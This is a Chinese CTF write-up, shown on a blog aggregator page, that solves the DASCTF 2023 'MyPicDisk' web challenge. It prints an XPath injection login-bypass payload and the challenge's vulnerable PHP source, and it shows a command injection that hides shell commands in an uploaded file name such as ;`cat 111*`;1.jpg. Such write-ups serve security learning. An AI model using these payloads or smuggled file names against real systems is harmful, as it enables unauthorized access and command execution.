惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Google DeepMind News
Google DeepMind News
Stack Overflow Blog
Stack Overflow Blog
Hugging Face - Blog
Hugging Face - Blog
博客园_首页
T
The Blog of Author Tim Ferriss
博客园 - 叶小钗
N
Netflix TechBlog - Medium
腾讯CDC
C
Check Point Blog
P
Proofpoint News Feed
Engineering at Meta
Engineering at Meta
GbyAI
GbyAI
S
SegmentFault 最新的问题
F
Fortinet All Blogs
美团技术团队
U
Unit 42
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
博客园 - 司徒正美
F
Full Disclosure
Recorded Future
Recorded Future
D
DataBreaches.Net
博客园 - 【当耐特】
Martin Fowler
Martin Fowler
J
Java Code Geeks
I
InfoQ
Y
Y Combinator Blog
A
About on SuperTechFans
AI
AI
爱范儿
爱范儿
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Forbes - Security
Forbes - Security
W
WeLiveSecurity
M
MIT News - Artificial intelligence
雷峰网
雷峰网
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Simon Willison's Weblog
Simon Willison's Weblog
Schneier on Security
Schneier on Security
The GitHub Blog
The GitHub Blog
Security Archives - TechRepublic
Security Archives - TechRepublic
aimingoo的专栏
aimingoo的专栏
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
G
GRAHAM CLULEY
Know Your Adversary
Know Your Adversary
Latest news
Latest news
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
D
Docker
Recent Commits to openclaw:main
Recent Commits to openclaw:main
量子位
V2EX - 技术
V2EX - 技术
Project Zero
Project Zero

lazy_forever's Blog

GeekCTF 2024 Web WriteUp(全) Java反序列化CC链 记一次零基础IOT设备与app交互0day漏洞挖掘学习经历 2023 DataCon大数据安全分析竞赛 WriteUp NewStarCTF 2023-WEEK4 Web WriteUp NewStarCTF 2023-WEEK3 Web WriteUp NewStarCTF 2023-WEEK2 Web WriteUp NewStarCTF 2023-WEEK1 WriteUp 天津市大学生信息安全网络攻防大赛 使用hexo框架搭建github静态博客 My First Blog
[DASCTF 2023 & 0X401七月暑期挑战赛] MyPicDisk
lazy_forever · 2023-07-27 · via lazy_forever's Blog

过程

开启容器,发现以下表单,表单信息通过post方法传送

通过xpath万能注入

1
username=admin'&password=']|//*|//*['&submit=%E7%99%BB%E5%BD%95

注入成功,burp观察返回包发现注释信息获得提示下载源码/y0u_cant_find_1t.zip

得到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
<?php
session_start();
error_reporting(0);
class FILE
{
public $filename;
public $lasttime;
public $size;
public function __construct($filename)
{
if (preg_match("/\//i", $filename)) {
throw new Error("hacker!");
}
$num = substr_count($filename, ".");
if ($num != 1) {
throw new Error("hacker!");
}
if (!is_file($filename)) {
throw new Error("???");
}
$this->filename = $filename;
$this->size = filesize($filename);
$this->lasttime = filemtime($filename);
}
public function remove()
{
unlink($this->filename);
}
public function show()
{
echo "Filename: " . $this->filename . " Last Modified Time: " . $this->lasttime . " Filesize: " . $this->size . "<br>";
}
public function __destruct()
{
system("ls -all " . $this->filename);
}
}
?>
<!DOCTYPE html>
<html>

<head>
<meta charset="UTF-8">
<title>MyPicDisk</title>
</head>

<body>
<?php
if (!isset($_SESSION['user'])) {
echo '
<form method="POST">
username:<input type="text" name="username"></p>
password:<input type="password" name="password"></p>
<input type="submit" value="登录" name="submit"></p>
</form>
';
$xml = simplexml_load_file('/tmp/secret.xml');
if ($_POST['submit']) {
$username = $_POST['username'];
$password = md5($_POST['password']);
$x_query = "/accounts/user[username='{$username}' and password='{$password}']";
$result = $xml->xpath($x_query);
if (count($result) == 0) {
echo '登录失败';
} else {
$_SESSION['user'] = $username;
echo "<script>alert('登录成功!');location.href='/index.php';</script>";
}
}
} else {
if ($_SESSION['user'] !== 'admin') {
echo "<script>alert('you are not admin!!!!!');</script>";
unset($_SESSION['user']);
echo "<script>location.href='/index.php';</script>";
}
echo "<!-- /y0u_cant_find_1t.zip -->";
if (!$_GET['file']) {
foreach (scandir(".") as $filename) {
if (preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
echo "<a href='index.php/?file=" . $filename . "'>" . $filename . "</a><br>";
}
}
echo '
<form action="index.php" method="post" enctype="multipart/form-data">
选择图片:<input type="file" name="file" id="">
<input type="submit" value="上传"></form>
';
if ($_FILES['file']) {
$filename = $_FILES['file']['name'];
if (!preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
die("hacker!");
}
if (move_uploaded_file($_FILES['file']['tmp_name'], $filename)) {
echo "<script>alert('图片上传成功!');location.href='/index.php';</script>";
} else {
die('failed');
}
}
} else {
$filename = $_GET['file'];
if ($_GET['todo'] === "md5") {
echo md5_file($filename);
} else {
$file = new FILE($filename);
if ($_GET['todo'] !== "remove" && $_GET['todo'] !== "show") {
echo "<img src='../" . $filename . "'><br>";
echo "<a href='../index.php/?file=" . $filename . "&&todo=remove'>remove</a><br>";
echo "<a href='../index.php/?file=" . $filename . "&&todo=show'>show</a><br>";
} else if ($_GET['todo'] === "remove") {
$file->remove();
echo "<script>alert('图片已删除!');location.href='/index.php';</script>";
} else if ($_GET['todo'] === "show") {
$file->show();
}
}
}
}
?>
</body>

</html>

分析源码,发现有文件上传白名单(jpg|jpeg|gif|png|bmp后缀名)

继续分析,发现class FILE的system("ls -all " . $this->filename);处存在命令拼接

但是有条件,必须保证文件名有且只有一个.,并且不能含有\/

接下来想方法绕过

首先上传文件1111.jpg,文件内容为ls /用来查看根目录flag文件名

接下来上传名为;`cat 111*`;1.jpg的文件再进行?filename=;`cat 111*`;1.jpg&todo=show,发现成功执行了命令,返回得到flag路径adjaskdhnask_flag_is_here_dakjdnmsakjnfksd

最后更换文件内容为cat /adjaskdhnask_flag_is_here_dakjdnmsakjnfksd,再次执行命令得到flag

原理

xpath注入

题目中xpath查询语句拼接后为

1
/accounts/user[username='admin'' and password='']|//*|//*['']

其实后面不重要,因为admin的引号已经将查询语句闭合了

相当于

1
/accounts/user[username='admin']

于是相当于查询是否有admin账户,得到结果

rce

;可以分隔一串命令

`Linux中反引号的作用是在将反引号内的命令处理完毕之后,会将返回的信息传给反引号的位置,再次执行命令

后记

看了网上好多wp,发现我的做法貌似是非预期

预期解是md5_file函数结合phar打的

太菜了太菜了,别的题目为什么不写wp,因为都不会。。。。。